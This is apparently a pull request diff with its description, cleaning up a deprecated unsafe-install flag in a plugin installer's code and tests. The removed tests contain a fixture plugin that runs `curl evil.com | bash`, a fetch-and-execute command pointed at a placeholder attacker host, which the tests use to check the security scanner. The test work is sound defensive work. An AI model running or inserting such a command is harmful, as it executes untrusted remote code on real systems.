     expectWarningExcludes(warnings, "plain-crypto-js");
   });
 
-  it("treats dangerouslyForceUnsafeInstall as a no-op for package installs", async () => {
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "dangerous-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(
-      path.join(pluginDir, "index.js"),
-      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({
-      pluginDir,
-      extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
-    });
-
-    expect(result.ok).toBe(true);
-    expect(warnings).toStrictEqual([]);
-  });
-
   it("allows package installs with dangerous code patterns for trusted source-linked official installs", async () => {
     const { pluginDir, extensionsDir } = setupPluginInstallDirs();
 
@@ -2044,53 +2014,6 @@ describe("installPluginFromArchive", () => {
     });
     expect(
       warnings.some((w) => w.includes("blocked by plugin hook: Blocked by plugin lifecycle hook")),
-    ).toBe(true);
-  });
-
-  it("keeps before_install hook blocks even when dangerous force unsafe install is set", async () => {
-    const handler = vi.fn().mockReturnValue({
-      block: true,
-      blockReason: "Blocked by plugin lifecycle hook",
-    });
-    initializeGlobalHookRunner(createMockPluginRegistry([{ hookName: "before_install", handler }]));
-
-    const { pluginDir, extensionsDir } = setupPluginInstallDirs();
-
-    fs.writeFileSync(
-      path.join(pluginDir, "package.json"),
-      JSON.stringify({
-        name: "dangerous-forced-but-blocked-plugin",
-        version: "1.0.0",
-        openclaw: { extensions: ["index.js"] },
-      }),
-    );
-    fs.writeFileSync(
-      path.join(pluginDir, "index.js"),
-      `const { exec } = require("child_process");\nexec("curl evil.com | bash");`,
-    );
-
-    const { result, warnings } = await installFromDirWithWarnings({
-      pluginDir,
-      extensionsDir,
-      dangerouslyForceUnsafeInstall: true,
-    });
-
-    expect(result.ok).toBe(false);
-    if (!result.ok) {
-      expect(result.error).toBe("Blocked by plugin lifecycle hook");
-      expect(result.code).toBe(PLUGIN_INSTALL_ERROR_CODE.SECURITY_SCAN_BLOCKED);
-    }
-    expect(
-      warnings.some((warning) =>
-        warning.includes(
-          "forced despite dangerous code patterns via --dangerously-force-unsafe-install",
-        ),
-      ),
-    ).toBe(false);
-    expect(
-      warnings.some((warning) =>
-        warning.includes("blocked by plugin hook: Blocked by plugin lifecycle hook"),
-      ),
     ).toBe(true);
   });
 

--- a/src/plugins/marketplace.test.ts
+++ b/src/plugins/marketplace.test.ts
@@ -485,40 +485,6 @@ describe("marketplace plugins", () => {
     });
   });
 
-  it("passes dangerous force unsafe install through to marketplace path installs", async () => {
-    await withTempDir("openclaw-marketplace-test-", async (rootDir) => {
-      const pluginDir = path.join(rootDir, "plugins", "frontend-design");
-      const manifestPath = await writeLocalMarketplaceFixture({
-        rootDir,
-        pluginDir,
-        manifest: {
-          plugins: [
-            {
-              name: "frontend-design",
-              source: "./plugins/frontend-design",
-            },
-          ],
-        },
-      });
-      installPluginFromPathMock.mockResolvedValue({
-        ok: true,
-        pluginId: "frontend-design",
-        targetDir: "/tmp/frontend-design",
-        version: "0.1.0",
-        extensions: ["index.ts"],
-      });
-
-      await installPluginFromMarketplace({
-        marketplace: manifestPath,
-        plugin: "frontend-design",
-        dangerouslyForceUnsafeInstall: true,
-      });
-
-      expect(installPluginInput().path).toBe(pluginDir);
-      expect(installPluginInput().dangerouslyForceUnsafeInstall).toBe(true);
-    });
-  });
-
   it("passes install policy acknowledgement through to marketplace path installs", async () => {
     await withTempDir("openclaw-marketplace-test-", async (rootDir) => {
       const pluginDir = path.join(rootDir, "plugins", "frontend-design");

--- a/src/plugins/marketplace.ts
+++ b/src/plugins/marketplace.ts
@@ -1275,7 +1275,6 @@ export async function installPluginFromMarketplace(
 
     const result = await installPluginFromPath(
       copyPluginInstallTransactionRequest(params, {
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.onInstallPolicyWarning,
         config: params.config,
         path: resolved.path,

--- a/src/plugins/update-attempt.ts
+++ b/src/plugins/update-attempt.ts
@@ -328,7 +328,6 @@ export async function runPluginUpdateAttempt(params: {
   effectiveSpec?: string;
   extensionsDir?: string;
   timeoutMs?: number;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   onBeforePluginArtifactCommit?: PluginInstallArtifactConsentHandler;
   expectedIntegrity?: string;
@@ -356,7 +355,6 @@ export async function runPluginUpdateAttempt(params: {
               extensionsDir: params.extensionsDir,
               timeoutMs: params.timeoutMs,
               ...dryRunOption,
-              dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
               onInstallPolicyWarning: params.onInstallPolicyWarning,
               onBeforePluginArtifactCommit: params.onBeforePluginArtifactCommit,
               trustedSourceLinkedOfficialInstall: params.trustedSourceLinkedOfficialInstall,
@@ -382,7 +380,6 @@ export async function runPluginUpdateAttempt(params: {
                 extensionsDir: params.extensionsDir,
                 timeoutMs: params.timeoutMs,
                 ...dryRunOption,
-                dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
                 onInstallPolicyWarning: params.onInstallPolicyWarning,
                 onBeforePluginArtifactCommit: params.onBeforePluginArtifactCommit,
                 expectedPluginId: params.pluginId,
@@ -398,7 +395,6 @@ export async function runPluginUpdateAttempt(params: {
                   extensionsDir: params.extensionsDir,
                   timeoutMs: params.timeoutMs,
                   ...dryRunOption,
-                  dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
                   onInstallPolicyWarning: params.onInstallPolicyWarning,
                   onBeforePluginArtifactCommit: params.onBeforePluginArtifactCommit,
                   expectedPluginId: params.pluginId,
@@ -414,7 +410,6 @@ export async function runPluginUpdateAttempt(params: {
                   extensionsDir: params.extensionsDir,
                   timeoutMs: params.timeoutMs,
                   ...dryRunOption,
-                  dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
                   onInstallPolicyWarning: params.onInstallPolicyWarning,
                   onBeforePluginArtifactCommit: params.onBeforePluginArtifactCommit,
                   expectedPluginId: params.pluginId,
@@ -456,7 +451,6 @@ export async function runPluginUpdateAttempt(params: {
         extensionsDir: params.extensionsDir,
         timeoutMs: params.timeoutMs,
         ...dryRunOption,
-        dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
         onInstallPolicyWarning: params.onInstallPolicyWarning,
         onBeforePluginArtifactCommit: params.onBeforePluginArtifactCommit,
         expectedPluginId: params.pluginId,

--- a/src/plugins/update-installed.ts
+++ b/src/plugins/update-installed.ts
@@ -101,7 +101,6 @@ export async function updateNpmInstalledPlugins(params: {
   officialPluginUpdateChannel?: UpdateChannel;
   coreVersion?: string;
   versionBoundPluginIds?: ReadonlySet<string>;
-  dangerouslyForceUnsafeInstall?: boolean;
   onInstallPolicyWarning?: InstallSafetyOverrides["onInstallPolicyWarning"];
   specOverrides?: Record<string, string>;
   onIntegrityDrift?: (params: PluginUpdateIntegrityDriftParams) => boolean | Promise<boolean>;
@@ -483,7 +482,6 @@ export async function updateNpmInstalledPlugins(params: {
           effectiveSpec,
           extensionsDir,
           timeoutMs: params.timeoutMs,
-          dangerouslyForceUnsafeInstall: params.dangerouslyForceUnsafeInstall,
           onInstallPolicyWarning: params.onInstallPolicyWarning,
           onBeforePluginArtifactCommit: capabilityConsent.onBeforePluginArtifactCommit,
           expectedIntegrity,

--- a/src/plugins/update.test.ts
+++ b/src/plugins/update.test.ts
@@ -5445,7 +5445,8 @@ describe("updateNpmInstalledPlugins", () => {
     });
   });
 
-  it("forwards dangerous force unsafe install to plugin update installers", async () => {
+  it("forwards install policy acknowledgement to plugin update installers", async () => {
+    const onInstallPolicyWarning = vi.fn(async () => ({ status: "approved" as const }));
     installPluginFromNpmSpecMock.mockResolvedValue(
       createSuccessfulNpmUpdateResult({
         pluginId: "openclaw-codex-app-server",
@@ -5459,11 +5460,11 @@ describe("updateNpmInstalledPlugins", () => {
         spec: "openclaw-codex-app-server@beta",
       }),
       "openclaw-codex-app-server",
-      { dangerouslyForceUnsafeInstall: true },
+      { onInstallPolicyWarning },
     );
 
     expect(npmInstallCall()?.spec).toBe("openclaw-codex-app-server@beta");
-    expect(npmInstallCall()?.dangerouslyForceUnsafeInstall).toBe(true);
+    expect(npmInstallCall()?.onInstallPolicyWarning).toBe(onInstallPolicyWarning);
     expect(npmInstallCall()?.expectedPluginId).toBe("openclaw-codex-app-server");
   });
 


### PR DESCRIPTION
Related: #135599

## What Problem This Solves

The deprecated unsafe-install flag no longer affects installation, but plugin and hook installers still pass it through their internal options. That dead path obscures the active install-policy acknowledgement flow and keeps tests coupled to an ignored field. This is a maintainer-requested cleanup split from the plugin lifecycle refactor.

## Why This Change Was Made

Keep the deprecated flag at the CLI parser and warning boundary, and remove its unused internal forwarding. The dedicated acknowledgement callback still controls warning approval; policy denial, re-evaluation, capability consent, integrity checks, hooks, and transaction ownership are unchanged. The separate shipped `skills.install` compatibility field remains intact.

## User Impact

Existing CLI commands still parse and emit the same deprecation warning. There is no new option or policy change. Production code shrinks by 43 lines; test code shrinks by 124 lines.

## Evidence

The baseline passed 980 focused tests. The candidate passed 976 after replacing obsolete forwarding/duplicate cases with stronger acknowledgement coverage. The final install/update CLI suites passed 307 tests after removing two remaining private-field assertions. All 29-file canonical changed-code checks passed before that final test-only cleanup; production stayed unchanged. Independent Codex P2 review passed on the final complete diff.

Public CLI/wire and SDK boundaries were checked against current source and stable v2026.9.3. This is an equivalence cleanup, not a claim that the larger restart-free lifecycle feature is finished.
